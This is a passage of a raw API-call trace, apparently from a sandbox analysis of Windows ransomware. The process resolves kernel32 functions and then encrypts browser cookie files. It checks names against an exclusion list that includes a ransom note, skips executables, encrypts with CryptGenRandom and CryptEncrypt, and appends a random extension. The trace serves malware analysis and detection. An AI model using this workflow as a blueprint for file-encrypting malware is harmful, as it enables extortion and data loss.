lpString1=0x3f2ca78, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0078.836] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0078.836] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0078.836] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0078.836] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0078.836] lstrlenA (lpString="CREATEPIPE") returned 10 [0078.837] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0078.837] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0078.837] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0078.837] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0078.837] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0078.837] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0078.837] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0078.837] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0078.837] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0078.837] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0078.837] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0078.837] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0078.837] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0078.837] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0078.837] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0078.837] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0078.837] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0078.837] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0078.837] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0078.837] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0078.837] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0078.837] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0078.837] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0078.837] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0078.837] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0078.837] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0078.837] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0078.837] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0078.837] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0078.837] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0078.837] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0078.837] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0078.837] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0078.837] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0078.837] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0078.837] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0078.838] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0078.838] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0078.838] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0078.838] lstrlenA (lpString="CREATETHREAD") returned 12 [0078.838] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0078.838] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0078.838] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0078.838] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0078.838] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0078.838] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0078.838] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0078.838] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0078.838] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0078.838] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0078.838] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0078.838] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0078.838] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0078.838] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0078.838] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0078.838] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0078.838] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0078.838] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0078.838] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0078.838] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0078.838] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0078.838] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0078.838] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0078.838] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0078.838] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0078.838] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0078.838] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0078.838] lstrlenA (lpString="CTRLROUTINE") returned 11 [0078.838] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0078.838] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0078.838] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0078.838] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0078.838] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0078.838] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0078.839] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0078.870] lstrlenA (lpString="DEBUGBREAK") returned 10 [0078.870] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0078.870] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0078.870] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0078.870] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0078.870] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0078.870] lstrlenA (lpString="DECODEPOINTER") returned 13 [0078.870] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0078.871] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0078.871] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0078.871] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0078.871] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0078.871] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0078.871] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0078.871] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0078.871] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0078.871] lstrlenA (lpString="DELETEATOM") returned 10 [0078.871] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0078.871] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0078.871] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0078.871] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0078.871] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0078.871] lstrlenA (lpString="DELETEFIBER") returned 11 [0078.871] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0078.871] lstrlenA (lpString="DELETEFILEA") returned 11 [0078.871] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0078.871] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0078.871] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0078.871] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0078.871] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0078.871] lstrlenA (lpString="DELETEFILEW") returned 11 [0078.871] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0078.871] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0078.871] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0078.871] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0078.871] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0078.871] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0078.871] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0078.871] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0078.871] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0078.871] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0078.871] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0078.871] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0078.871] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0078.871] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0078.872] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0078.872] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0078.872] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0078.872] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0078.872] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0078.872] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0078.872] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0078.872] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0078.872] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0078.872] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0078.872] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0078.872] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0078.872] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0078.872] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0078.872] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0078.872] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0078.872] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0078.872] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0078.872] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0078.872] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0078.872] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0078.872] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0078.872] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0078.872] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0078.872] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0078.872] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0078.872] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0078.872] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0078.872] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0078.872] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0078.872] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0078.872] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0078.872] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0078.872] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0078.872] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0078.872] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0078.872] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0078.873] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0078.873] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0078.873] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0078.873] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0078.873] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0078.873] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0078.873] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0078.873] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0078.873] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0078.873] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0078.873] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0078.873] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0078.873] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0078.873] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0078.873] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0078.873] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0078.873] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0078.873] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt") returned 106 [0078.873] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt.oO3X8") returned 112 [0078.873] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt.oO3X8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt.oo3x8"), dwFlags=0x0) returned 1 [0078.874] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.874] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.875] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.875] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1e658910, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1e658910, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1e658910, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x6f, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt", cAlternateFileName="5PB43E~1.TXT")) returned 1 [0078.875] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0078.875] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt", lpString2="autorun.inf") returned -1 [0078.875] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt", lpString2="boot.ini") returned -1 [0078.875] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt", lpString2="desktop.ini") returned -1 [0078.875] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt", lpString2="ntuser.dat") returned -1 [0078.875] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt", lpString2="iconcache.db") returned -1 [0078.875] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt", lpString2="bootsect.bak") returned -1 [0078.875] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt", lpString2="ntuser.dat.log") returned -1 [0078.875] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt", lpString2="thumbs.db") returned -1 [0078.875] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt", lpString2="Bootfont.bin") returned -1 [0078.875] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt") returned 38 [0078.875] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0078.875] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0078.875] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0078.875] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0078.875] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 72 [0078.875] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt") returned 38 [0078.875] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" [0078.875] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpString2="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt" [0078.875] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.876] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0078.876] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=111) returned 1 [0078.876] CreateFileMappingW (hFile=0x458, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x45c [0078.876] MapViewOfFile (hFileMappingObject=0x45c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0078.876] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0078.876] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0078.876] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.878] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0078.878] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0078.879] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.879] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0078.879] CloseHandle (hObject=0x45c) returned 1 [0078.879] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.879] WriteFile (in: hFile=0x458, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0078.880] CloseHandle (hObject=0x0) returned 0 [0078.880] CloseHandle (hObject=0x458) returned 1 [0078.881] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.881] VirtualFree 